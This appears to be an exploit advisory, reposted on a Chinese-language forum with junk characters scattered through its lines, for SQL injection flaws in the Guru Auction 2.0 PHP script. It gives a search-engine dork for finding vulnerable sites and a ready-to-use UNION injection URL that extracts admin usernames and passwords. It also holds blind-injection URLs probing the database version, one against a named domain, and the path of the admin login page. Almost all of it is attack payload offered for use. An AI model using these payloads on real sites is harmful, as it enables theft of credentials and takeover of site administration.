Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
5 ^8 I1 z! p1 K) ~6 r9 j/ n) B# v3 h7 [6 z Q3 i( M
作者 : v3n0m7 `6 b1 f2 G/ K8 {6 U4 {
应用 : Guru Auction 2.0
: ~& \. C! V9 P" b$ RPrice : $49: u, z, l, A4 C' `: o
Vendor : http://www.guruscript.com/
# E) Y5 Z" l- I) j+ ~Google Dork : inurl:subcat.php?cate_id=
( u; r1 D" ^* C ) f" N, @$ |- T3 h
SQLi p0c:
8 J6 R/ O3 U3 P6 o& H7 ` O~~~~~~~~~~
* t$ `4 V/ N$ d# T& lhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--1 K1 Z& E9 l% C: Y# H
9 z) V8 E& @# h8 R7 n+ v
) ]! N3 r$ M5 U7 T; V# D
盲注 p0c:
: a$ g8 q) i8 J3 l: m4 I~~~~~~~~~~
9 I2 J. E% J) w) H/ Rhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
% I9 A0 `* G& R4 y# V, T+ S$ nhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false6 p+ d& I' V( O" h$ u
: _. k) a" H0 B# B管理登录入口:& f P$ Y3 B3 M$ t0 o$ b L
~~~~~~~~~~. s+ _7 J2 E! }$ |7 m1 b6 B
http://domain.tld/[path]/admin/
4 q& B; [, I2 o6 W$ p |